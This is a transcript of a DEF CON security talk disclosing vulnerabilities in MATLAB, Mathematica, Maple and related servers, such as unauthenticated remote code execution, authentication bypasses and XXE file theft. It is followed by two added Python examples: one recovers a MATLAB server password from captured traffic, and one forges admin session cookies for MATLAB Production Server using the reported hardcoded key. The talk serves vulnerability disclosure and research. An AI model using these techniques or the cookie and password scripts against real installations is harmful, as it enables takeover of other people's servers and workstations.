Okay, so this afternoon's talk is, sorry for the lame title. And Toma, let's give a big DEF CON welcome, come on! Later! Thanks. Wow, it's an honor to be here at DEF CON again. I hope you do enjoy yourselves as well. I'm Toma. I've been calling myself a hacker for almost 10 years. I'm from Hungary and I've worked for an IT security company in Hungary as a pentester and developer. This is my first time at DEF CON and I'm also a regular speaker at Central Europe's hacker conference, Hacktivity. That's enough about me.

How did I choose this topic? It was not the usual way, so I didn't have any interest in MATLAB and the software, but I was at Fran's birthday party and at two or three o'clock in the morning her sister asked me if I could help her with MATLAB. And I had some vague memories about MATLAB from back at university, but of course I said yes. So the next day there I was, sitting in my room installing MATLAB, and it's a rule of thumb: what I install on my machine, I try to hack. And there was a lot of stuff to hack. This software is huge. There are several web servers, there's cloud integration, lots of functionality, lots of attack surface. So hacking is fun, so I dived in, but I didn't want to discriminate against MATLAB. So I also downloaded a trial of Mathematica and Maple, and together they gave a pretty nice topic to talk about. This talk probably won't be the most technical talk you will hear at DEF CON. I won't show you any groundbreaking techniques or methodologies, but I will show you a bunch of zero-days in these three software packages.

Let's start with MATLAB, some simple stuff. Like every scripting language, MATLAB also has facilities to run native code, native commands. It has a system command which you can use to execute OS commands. You can also use the bang symbol. And there are facilities to load native libraries, Java or .NET libraries and COM objects too. This is of course not a vulnerability in itself, but it can be used for malicious purposes.
For example, a spear-phishing attack can be created with a malicious MATLAB script. One other interesting aspect of this native command execution is that you can download MATLAB Mobile and you can create a free registration at MATLAB servers and you can actually run MATLAB functions on MATLAB servers, and this is not whitelisted or blacklisted, so you can also run these system commands on their servers. Granted, it's in a Docker environment. I did not try to escape it, but we all know that it's just a privilege escalation away.

Okay, so I mentioned using malicious MATLAB scripts in a phishing attack or something like that, but it should be fairly easy to protect against these attacks, because you just have to scan your scripts for these dangerous functions. But MathWorks has a solution against IP theft, which is the pcode function. With p-code, you can obfuscate your MATLAB scripts so it isn't obvious what they do. MathWorks itself uses it; lots and lots of functionality in MATLAB is implemented as p-files, p-coded MATLAB scripts. Even though MathWorks has a warning that this is merely an obfuscation, it's not secure enough to trust your sensitive data to it. But because lots of MATLAB's functionality is implemented as p-files, I needed to reverse engineer this algorithm. This was kind of painful, because there are a huge number of native libraries that call Java JARs, that in turn execute MATLAB p-files, that sometimes go back to Java libraries. So from an external viewpoint it's quite a mess. And it got me confused a few times. One of these even created a nice false alarm: I had found an RCE bug via static code analysis, but it turned out that that code was some leftover, code that is not used anyway. So eventually I found the p-code implementation and I was able to create a Python script that decodes p-files back to MATLAB scripts. It was a huge internal debate with myself whether I should release this Python script, but I decided against it.
Because even though MathWorks has that warning, lots of people use p-code to protect their research and I didn't want to expose it. But I will show you the most interesting step of the p-code algorithm. P-code consists of three steps. There's a serialization step, a compression step and an encryption step. The latter two are implemented in the m_parser library and they are pretty straightforward. They are really easy to reverse engineer, so if you are interested in it you could do it without problems. The serialization was more interesting, because it's a lot of, probably, C++ code and it would have been really painful to reverse engineer even with a decompiler. But what was interesting is that almost the whole algorithm could be understood by just looking at the p-files, just looking at the data.

So here is a p-file. It's already color coded, but even with the colors it should stick out that there are separate blocks that contain function names, numbers used in the script, and string literals. So what remains to be understood is this first block and this last one. If you look at the first block, it really seems to be seven DWORDs that have very small values, and if you look at these values, the first is 0x0C, which is 12, and if you count the function names, it's 12. The second number is two, and there are two numbers. So these seven DWORDs, it seems these are the numbers of symbols in the p-file. There are seven of them. I was able to identify three of them, but it turned out that it's not really important, so this was enough to reverse the algorithm. What remains is this last block, which seems to be a combination of some random numbers, which are in white, and some 0x80 0x80-something pairs. After a while it turned out that if you subtract 0x8080 from these pairs, then the result is an index into this array.
So the first one is 0x8080; you subtract 0x8080, you get zero, and the zeroth element of the array is x, and if we go back to the original script you can see that it indeed starts with the x, and the next symbol is an equals sign, so maybe 0x5F represents the equals sign and maybe all these numbers represent some symbols or reserved words in the MATLAB language. So this was the part when I asked for the help of a disassembler. I looked for these numbers in the disassembly of the library and I found an array of the reserved words and symbols, which could be easily extracted from the binary, so it only needed to substitute those numbers with the symbols and the reserved words to get the original MATLAB script. So it took a few days, but it was easy enough to reverse engineer the whole algorithm just by looking at the data.

I've already told you about MATLAB Mobile, and I've told you that you can connect to MATLAB servers with it, but it's not only MATLAB servers you can connect to; you can create your own and you can connect to it too. The communication between the mobile application and the server is HTTP communication. It's plain HTTP, there is no possibility to set up HTTPS, but the bodies seem to be base64-encoded binary blobs, so they are maybe encrypted. These are the request and response bodies. I have reverse engineered the server code and it turned out that it is indeed encrypted, but it is encrypted by XORing the plaintext message with the MATLAB server's password, so it's really strong encryption. But it gets better, because every single plaintext message is prefixed with the string matlabconnector_v1. This means that if you have one single message, you can XOR the first 18 bytes of it with matlabconnector_v1 and you get the password. So this is pretty nice, but the maximum password length is 32 bytes, so what if somebody sets a 32-byte password?
No worries, because of the structure of the plaintext messages. These are JSON messages; there are always 32 static bytes at the beginning of a message. So this is how a request starts and this is how a response starts, so if you get one message from the MATLAB Mobile application to the server, you can deduce the password. I have created a Burp Suite Pro extension that does exactly this. It retrieves the password and creates a MATLAB Connector tab that shows you the plaintext message and lets you edit it. I didn't try to test the MATLAB Mobile server further, but this could be a big help for that, for easy fuzzing of the server or something like that. This extension and all of my demos, all of my exploits, will be available on my GitHub shortly after my talk. You can download and play with it.

Okay, while I was looking for the implementation of MATLAB Mobile I found an interesting web.xml in the MATLAB server. It described some servlets, of which two seem very interesting: the engine servlet and the MATLAB servlet. The MATLAB servlet evaluates functions via a GET request. It is whitelisted, there are only a handful of functions that can be called, and it is localhost only. But I was looking at all these functions that can be called, and it turned out that the pslinkprivate function is basically just a wrapper around feval. feval is the MATLAB function used to evaluate arbitrary MATLAB functions. What this means is you can call arbitrary MATLAB functions, the system function included, with just one GET request to localhost, to the MATLAB server. So you can have a website that embeds an image with such a URL, and if somebody with an open MATLAB opens your website, it will execute whatever MATLAB command you want. So this means basically remote code execution on the victim's machine, as we will shortly see. So yeah, you can see the calculator opened, thanks.
Okay, so the other servlet also evaluates MATLAB functions, but this does not work in a default configuration, so you have to turn on the engine servlet. But it still can be used to, I don't know, backdoor somebody's machine. With the engine servlet there is no whitelist or blacklist; you can call any MATLAB function. It requires an API key, but this is burned into MATLAB; it's "matlab". And it's also localhost only, at least in theory, because they used the getRequestURL Java function to get the originating URL, which uses the Host header, so it can be very easily faked. There's the key, and I also have a demo for this. So I'm starting MATLAB and I'm gonna show you the simple curl command that can be used to start the calculator on the victim's machine via MATLAB. I'm just gonna fast forward a bit. So we can see that it's forbidden, because the engine servlet is not running right now. So this is the code that can be used to turn it on. Fast forwarding. Okay, it's on now and we try again, we get the calculator. So it's again remote code execution, but it needs the engine servlet to be turned on.

Okay, moving on to another MathWorks product. It's called MATLAB Production Server. It can be used to deploy MATLAB functions on the web. It has an Express-based management dashboard which uses signed cookies to store the session. It uses the cookie-session and keygrip npm packages for this. But it has a huge implementation problem, because they have an array of two keys. It contains "matlab" and "simulink", but in reality only the first one is ever used. They never rotate the keys. We can confirm this by creating a signature for a cookie using, e.g., OpenSSL, so you can see here's the password and we get the same signature that we got from the server. What this means for an attacker is that we can create a super cookie that grants administration rights to any MATLAB Production Server, always.
And this can of course be used to run code on the MATLAB Production Server, because you can upload a MATLAB function that contains only the system function and you can call it remotely. So I have a Python script that creates a new MPS instance. It creates a new application and deploys and starts it. And this application contains only that function. So if we run this Python script, you can see it's working and we have a new MPS application. It's running all right. So now we can use the MPS shell Python script to run commands on the MPS server. So as you can see, it's a bit slow, but it eventually answers with the results. So this is remote code execution without any authentication on the MPS server. So I did not do a thorough inspection of MPS. I did not have the time yet, but I have found some additional flaws. Just as an example, there's a stored XSS. I'm sure there are several others. So it's a nice target, I think.

Okay, so moving on to another math product. It's Mathematica. And it can also execute native commands, but Mathematica notebooks are not scripts, so they won't evaluate when you open them. But there are expressions called Dynamic that can be used to evaluate expressions automatically, but these dynamic expressions have some protections against malicious notebooks. There are some Mathematica functions, expressions, that are dangerous and they won't evaluate via a dynamic expression without user interaction. At least they shouldn't, but I have found a way, by trial and error, to bypass this protection. I'm a bit close. So I'm gonna show the whole trial-and-error process in this demo. The first thing I tried was a simple Run command, which can be used to run commands, but it pops up the CMD window, so I didn't like that. It turned out that RunProcess does not pop up the CMD window, so it looks better.
Now I'm trying to wrap this into a Dynamic, and it became quite a disaster, because every time a Dynamic is displayed it evaluates the expression, so it was a loop, and eventually I managed to quit, and I have also found a way to get around this infinite loop. We can use the TrackedSymbols Dynamic parameter to basically make a Dynamic update only once, when it's first displayed. So now if we try to save this into a file and, yeah, sorry. So I'm trying to open the file and there's indeed a warning, so it won't execute without user interaction. I was looking through the documentation and I found another expression called, oh sorry, there's something else in this video too. There are so-called safe directories, and the documents inside safe directories are not checked for these dangerous functions, so Dynamics will always evaluate from them. So if you can get somebody to download your malicious notebook to a safe location, then you are good to go. No tricks necessary. But if you don't have that luxury, you can use the Interpreter expression, which is used to run expressions from a string, and it should be a dangerous function, but it turned out it's not. So this can be used to auto-execute commands with a Mathematica notebook. So this is how you can bypass the Dynamic protection.

So really similar to Mathematica notebooks are Computable Document Format documents. These are almost the same, but they run in a restricted environment, they run in a sandbox, but you can also run them from a browser, so it somewhat widens the attack surface. The biggest restriction of the sandbox is that you have no file system access. You can't download files, you can't even execute commands, but there are still some ways to abuse these CDFs. When I was looking through the documentation I found out that you can do TCP/IP from CDFs, and my very first thought was that I could create a SOCKS proxy with that.
So if I can get someone to open my CDF document which implements the SOCKS proxy, then it will open a proxy into the victim machine, into the victim network. So I thought it would be pretty cool, so I did implement that proxy, and I'm gonna show you this with a Linux machine that runs an X server. This is the victim, and it will open the CDF file that implements the SOCKS proxy, and I'm gonna use it to create a screenshot of the X desktop remotely through the SOCKS server. So I'm using socat to redirect the SOCKS communication into a Unix socket. Okay, I started the CDF file, creating the listening socat for the X11 server. Just gonna fast forward a little bit. Okay, so now everything is running. I can use xwd to download a screenshot from the X server. It runs quite a while, so I'm fast forwarding again, but when it's done, I'm converting it to a PNG and you can see that creating the screenshot was indeed successful, thank you.

So another Wolfram Research product is Lightweight Grid Manager. It's a clustering solution from Wolfram Research. It's basically a Tomcat-based web application to manage Mathematica kernels. It needs authentication to make changes, but you can start kernels without authentication. It has some protection though, because you can set up an IP whitelist, but these protections have some very serious implementation flaws. First, for the authentication. This is the config file snippet that implements the authentication. You can see that it's only for GET and POST requests. This is the first flaw; you'll see shortly why. And they also have an AJP listener available. This is the second flaw. So the first one is a problem because the application will accept parameters from the query string, and this means you can use a HEAD HTTP request and it does not require authentication. It's not in the configuration file, so you can change any configuration without authentication by just using a HEAD request. But you have to bypass the IP filter first.
You can use AJP for this, because via AJP you can lie about the source address. You can say that you are coming from localhost, so the application will accept your request, because the IP filter is implemented at the application level and not at the application server level, so this can be used to bypass the IP filter. There is one more vulnerability in this implementation that makes it really easy to exploit. You can set the kernels path via a setting, and that functionality contains an OS command injection vulnerability, so this means if you combine these three vulnerabilities, you can have arbitrary OS command injection on any Lightweight Grid Manager server without any authentication. I have created a Python script that does this, so you can see it's the LGM application. I'm gonna start a listener and I'm going to start a connect-back shell by exploiting these vulnerabilities. Fast forward again; you can see that I have a connection back and I can execute commands on the LGM server. Okay, one other thing about LGM: it's not available, there is no trial or evaluation license, but I really wanted to test it, and I dug through the whole internet and I found a university website where there was a Mathematica license number available publicly. So maybe don't do that.

Okay, so Mathematica, and in general all Wolfram products, use the WSTP protocol to communicate internally between the kernel and the front end, and externally in a clustering situation or with some third-party native applications. This protocol uses plaintext communication, so it's pretty easy to launch a man-in-the-middle attack against it, and in this case a man-in-the-middle attack means remote code execution, because you can send a WSTP evaluate packet which will be evaluated on the receiving side.
I'm gonna show you this by connecting Mathematica to a grid and running a simple calculation on the grid. So I'm gonna calculate three times two using the grid and it gives us the result, but when I start my man-in-the-middle attack script, which uses hexinject to replace any packet with one evaluate packet, I'm using arpspoof to ARP poison, launching a listener, and when I try to compute three times two I get a connect-back shell, so I can run OS commands on the server. So this shows that the man-in-the-middle attack is really a remote code execution. You can also offload some heavy work from Mathematica to external programs, so you can call functions in these external programs from Mathematica, but that's dangerous functionality, because these external programs can also talk back to you and they can also send evaluate packets, so such an external program can execute code on your Mathematica server. I'm gonna show you this by slightly modifying one of the WSTP examples. I'm adding two evaluate lines: the first one just prints some message and the second one uses the Run expression, the RunProcess expression, to start the calculator. So I'm compiling it, starting the external program and creating a link to this program in Mathematica. When I try to Install this external program, you can see that the calculator runs. So it's not an exploit, not a vulnerability, but just some dangerous functionality in the program.
Okay, my last target, it's Maple. When I installed it and tried it, the first thing that stuck out to me was that Maple documents are XML files. It was not really a surprise that the software was susceptible to XXE attacks, but this of course requires that the victim opens a malicious Maple document. But there are two ports listening on every IP address on a default Maple install. The first one is not really interesting; it just accepts a number and shuts down the port. But the second one, TCP 1991, is really interesting, because it's a simple remote control server. Here is the protocol: you send it a ping, it sends it back, and now you can send the server a command, which can be starting a Maple application. Maple applications are defined as Java libraries, so they are burned into the software; it's not an obvious way to exploit this command. But you can also open Maple documents with the open command, and if you create a file share and put your malicious Maple document on that file share, then you can use this remote control server to open the malicious document from your file share on the victim's Maple machine. There is an auto-execute feature in Maple which can be used to execute native commands with this, but it requires user interaction, so it's a bit hard to exploit. But you can combine this remote control server with the fact that the application is susceptible to XXE, which does not need user interaction, so you can also do SSRF or download files from the victim's machine using an out-of-band XXE attack, which I'm going to show you.

So while Maple is starting, you can see that the file is just a simple XXE payload. I'm starting an FTP server that will receive the file we are going to steal. I'm also starting a web server that serves the second stage of the XXE payload. Okay. And I'm also starting an SMB server to serve my malicious Maple document. And now I can use the remote control server to open that document in the victim's Maple.
So there's the ping, and I'm opening that file from my server, and this is where you will see the result of the XXE exploit. You can see it's a directory listing, because Maple is in Java, and you can do directory listings in Java with XXE. But I know you all want to see another calculator, so I'm going to give you that shortly. It's the same attack. I'm just, yeah, that's your calculator. It's an ASCII calculator. Okay. This was my last demo and this is the end of my talk. There is a lot of stuff to look at in this software still. So these are just a few ideas. These are the things I will probably look at in the future. But I encourage you to do the same. Look around this software. And this is the end. Thank you for listening to my talk.
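Editor's added example for the MATLAB Mobile password-recovery step described in the talk. This is not the speaker's Burp extension and not MathWorks code; it shows the generic known-plaintext attack on a repeating-key XOR "cipher": XOR the ciphertext with the plaintext you already know to expose the key stream, find its period, and read the password off it. Assumptions, labelled in the code: the 18-byte fixed prefix is taken as matlabconnector_v1 (the exact spelling is not certain from the talk), the 32-byte upper bound on the password comes from the talk, and the sample messages and passwords are constructed for this demo.

```python
"""Known-plaintext recovery of a repeating-key XOR password (added example)."""
import base64
from itertools import cycle
from typing import Optional

# Assumed from the talk: every plaintext body starts with this fixed string.
KNOWN_PREFIX = b"matlabconnector_v1"
# Assumed from the talk: the server password is at most 32 bytes.
MAX_PASSWORD_LEN = 32


def xor_with_key(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; the same operation encrypts and decrypts."""
    return bytes(d ^ k for d, k in zip(data, cycle(key)))


def keystream_from_known_plaintext(ciphertext: bytes, known: bytes) -> bytes:
    """ciphertext XOR known-plaintext == the key bytes that covered that span."""
    return bytes(c ^ p for c, p in zip(ciphertext, known))


def recover_password(ciphertext: bytes, known: bytes = KNOWN_PREFIX,
                     max_len: int = MAX_PASSWORD_LEN) -> Optional[bytes]:
    """Return the password, or None if the known plaintext is too short.

    A repeating key of length p shows up as ks[i] == ks[i - p] for every i >= p.
    We take the shortest p that is confirmed by at least one repeated byte.
    If nothing repeats but we already hold max_len key bytes, the password
    must be exactly max_len bytes (any shorter key would have repeated).
    """
    ks = keystream_from_known_plaintext(ciphertext, known)
    for p in range(1, min(max_len, len(ks))):
        if all(ks[i] == ks[i - p] for i in range(p, len(ks))):
            return ks[:p]
    if len(ks) >= max_len:
        return ks[:max_len]
    return None


def encrypt_body(plaintext: bytes, password: bytes) -> str:
    """What the wire format looks like: base64(plaintext XOR password)."""
    return base64.b64encode(xor_with_key(plaintext, password)).decode()


def decrypt_body(body_b64: str, password: bytes) -> bytes:
    return xor_with_key(base64.b64decode(body_b64), password)


def recover_password_from_body(body_b64: str, known: bytes = KNOWN_PREFIX,
                               max_len: int = MAX_PASSWORD_LEN) -> Optional[bytes]:
    """Convenience wrapper: one captured base64 body in, password out."""
    return recover_password(base64.b64decode(body_b64), known, max_len)


if __name__ == "__main__":
    # Constructed sample: a short password and a JSON-looking message.
    password = b"s3cret!"
    message = KNOWN_PREFIX + b'{"type":"request","id":1}'
    body = encrypt_body(message, password)
    found = recover_password_from_body(body)
    print("recovered:", found)
    print("plaintext:", decrypt_body(body, found))
```

With only the 18-byte prefix, a password longer than 17 bytes cannot be confirmed and the function returns None; feeding it the 32 static bytes the talk mentions (prefix plus the fixed start of the JSON) is what closes that gap, exactly as the speaker describes for 32-byte passwords.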
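Editor's added example for the MATLAB Production Server cookie problem described in the talk. It is not MathWorks' dashboard code; it reimplements in Python what the cookie-session and keygrip npm packages do (keygrip signs with HMAC-SHA1 and base64url-encodes without padding; cookie-session stores base64(JSON) in the named cookie and the MAC of "name=value" in the ".sig" cookie), so you can forge a cookie for a known key and check which key index validates it. Assumptions, labelled in the code: the cookie name "session" is cookie-session's default, the key list [b"matlab", b"simulink"] follows the talk (case of the real strings unknown), and the session body {"user": "admin"} is a placeholder for whatever the real dashboard stores.

```python
"""Forge and verify cookie-session cookies signed with keygrip (added example)."""
import base64
import hashlib
import hmac
import json
from typing import Dict, List

# Assumed from the talk; the exact case of the real strings is not known.
ASSUMED_KEYS: List[bytes] = [b"matlab", b"simulink"]
# cookie-session's default cookie name; the real dashboard may use another.
DEFAULT_COOKIE_NAME = "session"


def keygrip_sign(key: bytes, data: bytes) -> str:
    """keygrip default: HMAC-SHA1, base64 with '+'->'-', '/'->'_', '=' stripped."""
    mac = hmac.new(key, data, hashlib.sha1).digest()
    return base64.urlsafe_b64encode(mac).decode().rstrip("=")


def keygrip_index(keys: List[bytes], data: bytes, signature: str) -> int:
    """Like keygrip.index(): index of the first key that validates, else -1."""
    for i, key in enumerate(keys):
        if hmac.compare_digest(keygrip_sign(key, data), signature):
            return i
    return -1


def encode_session(session: dict) -> str:
    """cookie-session stores base64(JSON.stringify(session))."""
    raw = json.dumps(session, separators=(",", ":")).encode()
    return base64.b64encode(raw).decode()


def decode_session(value: str) -> dict:
    return json.loads(base64.b64decode(value))


def forge_session_cookies(session: dict, key: bytes,
                          name: str = DEFAULT_COOKIE_NAME) -> Dict[str, str]:
    """Build the value cookie and its '.sig' companion; the MAC covers 'name=value'."""
    value = encode_session(session)
    sig = keygrip_sign(key, f"{name}={value}".encode())
    return {name: value, f"{name}.sig": sig}


def verify_session_cookies(cookies: Dict[str, str], keys: List[bytes],
                           name: str = DEFAULT_COOKIE_NAME) -> int:
    """Return the index of the key that validates the pair, or -1.

    An index > 0 is what a rotated key looks like (the cookies library would
    re-sign with keys[0]); the talk reports only keys[0] is ever in use.
    """
    value = cookies.get(name)
    sig = cookies.get(f"{name}.sig")
    if value is None or sig is None:
        return -1
    return keygrip_index(keys, f"{name}={value}".encode(), sig)


if __name__ == "__main__":
    # Placeholder claim; the real session layout is not known from the talk.
    forged = forge_session_cookies({"user": "admin"}, ASSUMED_KEYS[0])
    print("Cookie: " + "; ".join(f"{k}={v}" for k, v in forged.items()))
    print("valid with key index:", verify_session_cookies(forged, ASSUMED_KEYS))
```

The point the talk makes is that a burned-in, never-rotated key turns every signed cookie into a password equivalent: anyone who knows keys[0] can mint an admin session for any installation, and nothing in the verification path can tell a forged cookie from a real one.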